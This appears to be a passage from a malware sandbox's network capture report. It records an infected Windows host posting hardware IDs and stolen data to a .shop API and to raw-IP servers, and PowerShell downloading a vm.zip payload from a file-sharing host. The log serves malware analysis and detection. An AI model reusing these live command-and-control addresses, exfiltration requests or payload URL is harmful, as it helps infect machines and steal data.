2024-07-24 17:56:56 UTC	15069	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-24 17:56:56 UTC	814	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:56:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jr95vl9qiug8ldccb7op3uif6k; expires=Sun, 17-Nov-2024 11:43:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fcdu42JmNEKI1UG%2F7wU5sYYKLy8YC2%2BCJBUm7dwSd%2FHhhGLxX35auveV26FAeSlGHMYxKmqzWeXsIDKX7f3LRQorDj0j0Nw9wXmqSQZNwgvi%2BUyMlUfsv5eLTuL23wr2xAK%2FHDFN9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca2b3c2a4207-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:56:56 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:56:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49764	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:56 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:56:56 UTC	1267	OUT	Data Raw: 68 4b 53 77 2b 6d 5a 72 59 65 37 45 75 61 45 78 45 42 4f 49 76 45 44 6e 54 59 68 39 4e 42 7a 6b 4b 73 71 6b 31 7a 5a 6f 65 52 58 32 78 39 36 56 74 59 46 46 6f 2f 6d 48 55 44 78 46 57 7a 67 67 30 49 50 61 41 4f 73 4a 33 69 36 63 45 6f 34 49 37 34 39 42 38 30 5a 74 6b 7a 56 77 37 79 61 72 59 64 70 65 61 64 68 59 34 73 6c 6e 4a 65 43 72 2b 53 52 4d 67 6e 79 6e 69 73 4f 66 76 31 37 4c 47 46 4d 63 57 53 53 42 37 6e 48 4c 30 58 33 74 69 63 67 31 61 75 6b 45 45 48 51 79 64 32 33 68 68 55 2f 34 56 31 57 36 51 50 79 62 39 30 7a 46 6d 32 54 6f 6d 54 79 79 79 66 75 52 4e 4d 30 70 58 72 79 71 6c 49 69 62 39 6e 50 54 59 7a 61 6d 75 4d 39 6b 4f 4a 66 72 34 34 50 65 67 42 64 4c 4a 2f 6a 4d 37 59 70 35 7a 6a 61 39 53 34 57 58 79 47 45 6f 7a 70 74 63 7a 30 37 72 48 6b 5a Data Ascii: hKSw+mZrYe7EuaExEBOIvEDnTYh9NBzkKsqk1zZoeRX2x96VtYFFo/mHUDxFWzgg0IPaAOsJ3i6cEo4I749B80ZtkzVw7yarYdpeadhY4slnJeCr+SRMgnynisOfv17LGFMcWSSB7nHL0X3ticg1aukEEHQyd23hhU/4V1W6QPyb90zFm2TomTyyyfuRNM0pXryqlIib9nPTYzamuM9kOJfr44PegBdLJ/jM7Yp5zja9S4WXyGEozptcz07rHkZ
2024-07-24 17:56:58 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:56:58 UTC	685	IN	Data Raw: 4e 6d 46 45 57 78 41 62 70 76 75 5a 53 4b 79 33 50 78 78 4d 44 74 43 6f 69 76 53 37 47 64 33 36 6d 69 78 37 63 54 36 48 69 55 70 79 66 6a 72 37 67 57 45 43 70 6b 66 68 4c 54 2f 4f 75 32 4a 6a 4b 50 56 45 7a 46 71 4c 50 67 79 50 37 5a 35 4f 58 34 36 4e 39 30 34 6a 52 65 68 76 50 6e 66 32 38 32 7a 73 41 70 51 30 63 62 31 2b 71 61 59 75 6a 72 46 61 38 66 64 2f 35 61 2b 65 63 72 77 37 31 6a 53 50 33 74 43 31 71 52 64 76 52 66 63 34 44 70 6a 55 42 48 31 71 48 73 61 68 57 31 55 51 59 2f 4a 44 65 44 72 44 65 4a 39 63 72 44 5a 39 4d 6d 66 77 66 68 49 4f 4c 74 78 50 43 33 6c 48 63 62 4f 69 67 4f 2b 55 76 6c 62 37 68 31 57 39 67 6c 66 72 75 62 6f 6b 71 2f 66 65 4a 44 52 67 57 75 78 6e 4e 71 41 57 63 38 6f 77 74 51 2f 70 46 35 65 57 34 4c 55 37 51 64 66 34 31 4a 6d Data Ascii: NmFEWxAbpvuZSKy3PxxMDtCoivS7Gd36mix7cT6HiUpyfjr7gWECpkfhLT/Ou2JjKPVEzFqLPgyP7Z5OX46N904jRehvPnf282zsApQ0cb1+qaYujrFa8fd/5a+ecrw71jSP3tC1qRdvRfc4DpjUBH1qHsahW1UQY/JDeDrDeJ9crDZ9MmfwfhIOLtxPC3lHcbOigO+Uvlb7h1W9glfrubokq/feJDRgWuxnNqAWc8owtQ/pF5eW4LU7Qdf41Jm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49763	31.14.70.245	443	6872	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:56 UTC	220	OUT	GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io Connection: Keep-Alive
2024-07-24 17:56:57 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Wed, 24 Jul 2024 17:56:57 GMT Content-Type: application/zip Content-Length: 296998 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''vm.zip Last-Modified: Sat, 20 Jul 2024 15:35:59 GMT
2024-07-24 17:56:57 UTC	512	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 dd 74 ee 58 cf a1 af e2 8a 9e 01 00 ff 9f 01 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1e 2c e1 d3 60 9c e8 00 00 00 00 5a b9 e0 9f 01 00 b0 01 30 84 0a 17 00 00 00 02 84 0a 17 00 00 00 e2 f0 81 c7 c8 60 d4 c8 e0 38 d3 0d 6b a8 40 7e 43 42 42 78 45 44 b8 8e c4 f4 26 64 49 c2 fa 90 bd c3 8e 2c 04 65 ca 0c c3 44 33 63 e6 cd 00 1b 15 f2 75 2e 36 08 0d 0d 0d 0d 09 fb e8 2c e7 02 e7 51 1d a5 d6 20 04 61 48 5d 3f 41 9f fb e3 78 8c 57 37 d8 63 1c 04 3b ac 66 fe 55 cd 04 c3 1d cc a6 43 93 5a 4b 8b 57 0a ee dd 76 c6 f0 c4 6f 0b a9 0d b8 52 ab f3 f7 de 75 2d 32 fd d6 ea f7 c9 c6 8c af bf 8a 23 db f4 53 5f 0a f2 0a ef 6d 13 d4 b1 3f 0c f6 df 34 16 d5 4b e0 f1 1b 76 cd 49 6c 55 65 c4 f8 b1 01 f5 86 86 ce fc 44 83 fe 80 f7 d7 52 e7 bf 20 Data Ascii: PKtXdata.bin,`Z0`8k@~CBBxED&dI,eD3cu.6,Q aH]?AxW7c;fUCZKWvoRu-2#S_m?4KvIlUeDR
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 33 95 ce 64 b8 6e 4a 63 20 5a 89 ec 08 66 8d 4f d6 f5 94 60 1f 4a 69 7a 91 77 33 98 ce e1 73 f5 64 f9 52 17 f4 ec 11 ff 0d 2b 1b b7 5c 82 b9 83 4d 06 af b5 93 16 93 73 06 4a da 21 57 0e d0 d4 9e e4 fa f7 cb 46 51 28 9c f3 f6 26 d0 6a 7c aa d9 31 b5 3b ff 7d cb 79 6f d4 dd eb ed e7 31 d7 1e 41 6c 9c 8b fc 7f 85 a4 04 36 5d 41 e6 6e 44 2e 2d 14 7e ad 9c 70 7a 7e e5 31 7f c5 00 67 b5 90 1a ea ea ea ea ea ea ea ea e8 e9 e9 e9 e5 e6 e6 e6 e6 e6 e6 e6 e0 13 44 2f 56 22 5c 4e 1d e3 63 a0 71 d0 96 6e 78 69 bc ae ef 38 6c da c7 37 97 5e e2 c0 d1 91 6c de 28 53 5e fb b0 9c 48 d1 02 aa f8 a5 f3 52 1e c6 a3 90 9d ea bc ea 56 12 20 18 75 cb 1f 54 c6 e9 c3 dc eb 37 3b 32 ca d2 da 51 95 29 35 28 8e 30 e1 f1 c9 21 dc f4 12 04 2f f9 89 ad 07 e3 87 16 7a 85 5d d5 e8 2c 01 Data Ascii: 3dnJc ZfO`Jizw3sdR+\MsJ!WFQ(&j\|1;}yo1Al6]AnD.-~pz~1gD/V"\Ncqnxi8l7^l(S^HRV uT7;2Q)5(0!/z],
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 33 7a bc 50 22 52 fe a2 f8 c4 39 89 3f 2e b3 06 08 22 29 03 16 ca 97 fa fc ec cb 51 ad b4 e3 59 e8 e8 bd cc 9c a4 44 21 29 8f 90 c0 20 2c b5 46 f5 45 56 76 bd 24 35 12 10 a7 35 d7 08 20 36 69 79 3a 22 a3 79 ff 42 41 6f db 85 d3 ef 9b 60 55 f9 54 8a c2 72 9b 7d 54 31 eb dc dd 48 dc c5 49 8c 2c a0 65 61 e7 62 0d 64 c0 f9 be 99 1a 67 5d ea 32 e5 3d cf 89 03 e0 09 db 8e af d9 26 6e b6 8a ae df 68 1a be 7c 10 e4 5c 57 87 1e 20 02 ed 21 8c 01 fd f5 e3 93 62 56 48 53 d7 19 37 00 9f 42 f1 58 a5 c2 b5 61 3a f9 d7 fb f8 81 4c 18 8a ca 16 4d e5 59 cf 2f e4 0c a5 df 09 13 fc 1b d0 33 b0 a1 12 db fd 3c 03 81 b3 76 41 58 ff 5e 80 17 f4 3c 43 4e 55 da 72 3b 68 6c e6 a0 58 55 c7 6a c2 2b 97 6b 53 bf 9d 7c e8 61 47 e2 ed 07 35 e2 05 c1 5d e7 ae 3b a5 4d fd a7 3f 25 5d 9f Data Ascii: 3zP"R9?.")QYD!) ,FEVv$55 6iy:"yBAo`UTr}T1HI,eabdg]2=&nh\|\W !bVHS7BXa:LMY/3<vAX^<CNUr;hlXUj+kS\|aG5];M?%]
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 3d cd 6c 50 05 c1 90 f9 06 f1 67 cd c8 d2 23 5d 14 fe ee d9 c2 b5 3e 6e 71 71 cc f5 88 08 47 5b 04 c1 44 5c 8f 0b 5a 1f 96 70 7e fb 05 aa b8 f1 4c 3a 6f 3c e8 a1 d6 f5 91 60 4d 31 3c b9 44 32 47 5d 53 a4 d9 a8 2f a8 28 b5 e3 d2 c1 85 41 89 e0 3b 13 57 8f c5 4c 00 af 1d c0 97 54 25 95 13 2c 2f 72 31 b7 ef f4 4b 14 c3 03 7d ea 68 b1 62 c5 af 3f 21 19 5a d2 25 78 8f 6e 38 4d 89 27 13 3b 77 40 0a b7 47 1e 2c 80 7d 26 63 cb 15 8e 56 7c 85 40 80 57 d6 38 d9 bd 43 c8 72 f6 55 4b bf 28 3d d1 51 9f c2 e4 b3 20 48 f8 19 c7 60 04 c6 3f 2c 0a cf 2f 84 47 3a 0e 81 c7 80 3e 8c 55 4a a5 79 af 21 b1 08 fd 56 55 13 f2 ac 96 e3 5c dd 6b b0 c6 26 c4 12 77 5d 8b 5b 23 2d 97 ac b5 9a a1 e6 63 44 d1 6f 92 dc 97 06 a7 4e b4 97 55 dc be 7a 6a 16 6b c8 45 30 c2 40 7b 66 f3 cf 3a Data Ascii: =lPg#]>nqqG[D\Zp~L:o<`M1<D2G]S/(A;WLT%,/r1K}hb?!Z%xn8M';w@G,}&cV\|@W8CrUK(=Q H`?,/G:>UJy!VU\k&w][#-cDoNUzjkE0@{f:
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 42 2f 38 dc 0f 26 2c e6 f7 ba 11 2e 00 f4 ca 5b de 37 06 33 99 8c 4f e9 32 9f 90 d8 f5 9b 8f c6 83 53 f0 f0 07 ff dd 71 a4 f2 63 ee ff 47 34 ad 89 c3 31 65 8f b4 fc dc 75 39 15 dc 3b 4a d9 aa 2f 79 ba ae 05 7a a2 c6 e9 a5 36 5c aa eb bf a3 22 42 59 64 a1 f1 c6 a9 43 41 b5 fc e9 75 85 c5 17 0c 95 26 59 3a 58 e6 49 1b 14 81 5f 74 e7 23 30 f6 7e f6 b4 dc f0 4c 8f 9f af ce bb 39 7d b8 0c 38 2c 3c 85 bf 73 89 15 05 d9 c7 ba 9c b0 b6 c7 06 26 f2 55 21 d3 e8 dd 23 fb 58 ab 31 f7 f1 2f 08 0b 84 52 0e 65 c5 d4 d5 cc 85 5c 7e 25 39 2b 97 b0 fd 15 5c a6 a6 29 65 e0 4c 80 4c 7c b6 a0 29 66 e5 a4 b5 7d 8f de f3 1c 55 68 d7 4b b2 1c 15 f8 6b 16 f3 6b 56 5b 29 d5 af 2c 62 11 75 4f 88 28 1d 01 5c 72 b1 4c fa 88 2c 6d 10 31 fe a6 e3 c9 fd f3 8a fd 1e e3 f2 9d 57 07 4c 53 Data Ascii: B/8&,.[73O2SqcG41eu9;J/yz6\"BYdCAu&Y:XI_t#0~L9}8,<s&U!#X1/Re\~%9+\)eLL\|)f}UhKkkV[),buO(\rL,m1WLS
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 0e 76 6b de 75 6e 21 70 29 8a 7a 31 f3 42 32 b6 49 e1 39 ac f9 c0 3f 5e 6b cf ce a1 c4 13 20 f4 96 f6 90 a8 7d ff 0f 2d e4 fd 74 e3 28 c4 d3 a4 83 f0 30 bd 5e 35 61 bd 64 6c 4a 98 8e 03 e9 e7 05 96 6f b4 12 12 89 9e 7b 1b 40 b5 7e 9b ee 82 1d ea ac cb eb 85 06 c0 2f cc 86 33 8e d7 97 b4 c6 82 20 54 76 54 8c af 89 09 69 bb 91 a2 ee 7c f8 e1 b4 32 0d 4c 5a 4f 74 f8 c3 10 ce 72 b4 cc f9 9d f6 57 9e 05 fe fc 21 9e 9c b7 9d 80 ac 8e 23 84 cc 0f be ac aa 0c bd 22 9a 24 ed 55 b5 b2 b2 7e ab b7 2e ab 93 60 d4 2c 1d 4b 67 0d 6d 0a c8 7e 7b 84 69 80 46 10 a4 e3 28 d1 3c 8b 77 14 8d b8 f4 c1 73 73 b8 b4 c6 77 e8 3d f2 b0 95 48 48 18 24 3c 8c 2f 5c 85 6c 71 e0 1a 52 82 c2 f7 04 c8 16 03 77 bd ea 37 7a 0e e1 1e 83 63 e5 ab e4 1d 2f 56 22 a4 ab 71 eb f7 7f 71 ab f2 79 Data Ascii: vkun!p)z1B2I9?^k }-t(0^5adlJo{@~/3 TvTi\|2LZOtrW!#"$U~.`,Kgm~{iF(<wssw=HH$</\lqRw7zc/V"qqy
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 61 44 99 ae d9 5f 85 61 f5 9a ae b4 27 63 28 9a e3 83 1c 5c 93 9e d9 a4 e0 ef 8b 92 20 f7 c5 6c b4 66 b5 3f dc b1 f4 f6 c4 46 c0 4d 59 9a 4c 9e 82 0a 05 f6 a8 b8 bb 46 f5 76 6b 3c 91 55 e6 c1 d1 aa 30 5b 35 05 ea b8 78 9d 48 d7 e3 2c 79 14 3e ad fa 94 8c a5 14 d8 23 52 d5 0d ee 34 f9 47 53 f7 63 6c 45 ae 5c 72 45 7b b9 64 83 ed 54 74 62 f3 54 87 71 3a a0 ba 5d 1e 9a 44 84 25 4c 29 11 85 62 28 86 c4 62 4d d5 3c f8 fa 12 75 d4 2c 7b 53 fb 08 b5 05 34 23 b3 36 45 35 e0 e7 67 5c 50 97 3f 4e 81 85 63 a9 22 b9 9c 03 6d 9a 53 9f 5d d7 2f e3 ef 69 7b ac de ac 89 67 c3 68 45 93 32 f9 61 e3 34 0b 87 95 47 00 ef c4 cc d6 ef ff 91 99 d2 25 27 05 96 11 b1 3d b9 88 c9 24 24 33 ed 57 59 5f e1 47 43 dc 39 fe 91 57 63 33 5e 48 e4 11 0a 02 d4 72 f4 ed da f1 25 78 7f d6 4a Data Ascii: aD_a'c(\ lf?FMYLFvk<U0[5xH,y>#R4GSclE\rE{dTtbTq:]D%L)b(bM<u,{S4#6E5g\P?Nc"mS]/i{ghE2a4G%'=$$3WY_GC9Wc3^Hr%xJ
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: c6 9a 08 b4 f1 1f fe 00 fd 46 f6 8d 91 d7 25 3e 0d bb b8 2a 21 34 7f 26 7b d8 57 ea 8b f7 d4 dd 58 da 17 30 a7 07 70 66 05 33 de c5 86 42 1b c6 45 a9 3c dc dc 0b 07 c5 ad 5a a4 4c 86 2d 04 ba 90 3f fb 2c cd 71 25 2a 95 61 01 3b 85 d4 e5 9b 47 da 17 5a 13 71 e8 f5 ea f7 ef 53 e7 36 e6 cf d0 c9 1e 25 b7 79 66 93 a9 64 94 bc df 87 83 c0 4d 92 09 63 4e cc 7c c6 6c d1 78 1f 7c 2a be ad c7 bc 69 39 a7 c3 00 4a aa 0e 27 c1 0e 13 ec 8c bd 32 07 a0 0c b3 0b 16 f0 ff 57 42 e1 26 ec 71 b4 af 88 d3 13 0a 08 9f 0f 17 be d1 71 ef 82 06 8b 4d 52 1a 86 06 d6 b9 1f ae 05 4b 6d ca 31 67 fc 97 75 29 2a 72 bc 54 11 2c a8 ce 94 05 dc 54 a5 09 61 bc 9f e5 d1 7e fb 1a bd d3 eb 17 e9 e5 cc b9 c9 ce af 4f 84 ad da 97 12 2d 81 d4 5a 23 c4 15 9e ec 98 91 c6 16 eb 2d 6a e9 f5 4d 45 Data Ascii: F%>!4&{WX0pf3BE<ZL-?,q%a;GZqS6%yfdMcN\|lx\|i9J'2WB&qqMRKm1gu)rT,Ta~O-Z#-jME
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 3a b1 f5 56 a3 46 09 66 0f 7c 4c 68 ea 1d 72 9d 06 f0 dd e5 73 ca d9 33 bc 95 e7 29 85 46 2e 9d a1 a4 9c 63 57 56 c6 c6 f4 4e 05 86 44 ea 37 65 30 84 79 0e f7 c8 84 b4 71 bf a2 de b1 b6 10 87 06 07 3c c9 76 a3 0a 7b 4f b7 1c 1c 66 da 89 8a d3 9e 10 3b 35 97 b2 1e 18 99 80 6e 22 b5 7f 7e 41 4a 3b 98 1b ae 71 de 60 d0 9d aa a6 73 c8 99 ce 00 6b 4e e5 c9 cf c7 04 a1 f0 49 64 6f 8b 8b 4f 01 9c c4 f3 ce 4b 1d d5 26 87 81 88 3c bf f2 b6 b3 f7 97 ee b1 1b 4f 8a 74 24 1d 92 1f 39 7d 2e c0 0d 9c 17 b6 d9 71 34 3f e0 78 cf a5 0e 4a 3f 57 9a eb 75 57 48 2c e4 f1 d5 b9 69 f1 41 3c 32 ff 23 ed 60 09 21 98 5e b9 9e ba 67 95 00 9d 25 f9 62 1d 1d 2a 4e ce bb 74 52 27 97 11 39 71 ac df 04 ca 34 71 9e 44 70 1a 53 8e 78 5f 07 6b 28 8b f1 b4 f8 8a 93 e3 13 27 0f 8d f1 c6 a2 Data Ascii: :VFf\|Lhrs3)F.cWVND7e0yq<v{Of;5n"~AJ;q`skNIdoOK&<Ot$9}.q4?xJ?WuWH,iA<2#`!^g%b*NtR'9q4qDpSx_k('
2024-07-24 17:56:57 UTC	4096	IN	Data Raw: 34 02 0a 6c 1e bc a6 59 40 b8 41 3d 0e 24 4e 66 dc 6d 19 d4 b0 73 28 7c b0 e5 f2 82 51 cf 80 02 43 34 45 2a 9a 8c 3c 60 2f d1 7b 7f 0b 5f 2a 3e 10 b3 8a ab 82 8b e6 6a f1 a1 5e 1b b8 8f 71 db 09 d9 be 39 83 6f 1e 51 d4 3c 3f 80 8c 5d 7a 31 6e b3 89 67 c0 30 d7 df c0 f0 1e ed e0 92 d9 a7 09 0f b6 9c 47 81 a8 12 48 60 10 4f 14 0c d3 15 ca 54 23 e5 5d 6e c5 03 e5 10 9a f0 3e b4 02 26 e8 b9 01 a6 65 79 5b 7b 66 b2 5c 70 b9 16 d5 26 f9 e8 5e e9 ea 5f 00 b7 73 25 b9 f9 5b 5e 3e 82 1f 48 f2 6c 61 0b cf e4 cd d2 33 e4 c8 4c 19 05 b7 09 57 69 33 c0 b2 9a 94 93 2b dd 7c 16 b4 60 18 99 a7 c8 d2 de 5c c7 7e 8b 11 30 93 37 15 e0 02 01 c1 b1 78 df f0 1c 5a 35 e4 ab 35 1b 06 54 d1 af 73 88 df e2 29 cb b9 b3 48 0a ab 78 5d 2b 7d 88 a5 e6 28 f3 1d 1d f6 db 5c 10 cd f6 2c Data Ascii: 4lY@A=$Nfms(\|QC4E<`/{_>j^q9oQ<?]z1ng0GH`OT#]n>&ey[{f\p&^_s%[^>Hla3LWi3+\|`\~07xZ55Ts)Hx]+}(\,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49765	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:57 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20431 Host: callosallsaospz.shop
2024-07-24 17:56:57 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-24 17:56:57 UTC	5100	OUT	Data Raw: 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 Data Ascii: `?lpQ0/74G6(~`~O
2024-07-24 17:56:58 UTC	814	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:56:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g3nk6fe029livsrvt6n8cpnm8e; expires=Sun, 17-Nov-2024 11:43:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gR73HcGyEZMx14Hl9zmXJlB5SW%2F4pEvvrb928mQpx3Tws7fU7UPhKOfn%2FA%2FzEZMwpxtei%2BdZ4zC%2BiCCNO2HNBS2pqUIIXWRgN3qm0%2BLzTY8gTxN80xEWtzNjSv8msOb8xqxFE3Un1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca357eb5426a-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:56:58 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:56:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49766	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:58 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:56:58 UTC	1122	OUT	Data Raw: 6e 38 69 77 33 4b 64 37 6e 58 34 59 2f 78 63 43 38 2b 62 75 54 77 51 32 76 56 5a 69 30 59 55 57 68 55 54 50 6e 51 62 74 7a 32 54 51 6e 48 48 46 30 77 44 37 6a 52 69 4b 44 64 51 31 54 4d 52 48 63 6e 48 5a 6d 76 76 49 4d 55 33 73 44 44 4c 79 62 61 2b 33 30 44 31 69 6c 2f 48 52 4d 52 79 66 70 51 59 6c 56 4c 69 65 38 73 75 67 67 53 45 52 77 35 6d 43 41 30 51 6c 55 39 48 69 74 34 6e 4a 32 4a 44 42 53 34 70 62 35 6b 30 79 31 66 2f 56 4c 2b 37 49 76 30 79 59 4f 4d 69 61 64 56 5a 6c 48 70 5a 68 51 37 52 6a 6f 52 38 66 62 63 35 57 6a 57 71 4f 30 5a 78 42 48 71 4e 4a 49 35 56 46 49 45 58 36 42 71 51 72 71 74 43 32 68 48 6e 53 50 50 39 30 4b 62 77 6e 6f 4f 38 4c 52 6e 6b 72 62 2b 79 38 79 77 56 51 6f 76 65 43 51 6b 58 66 72 4e 43 67 57 68 77 56 49 6b 4b 70 6a 58 69 Data Ascii: 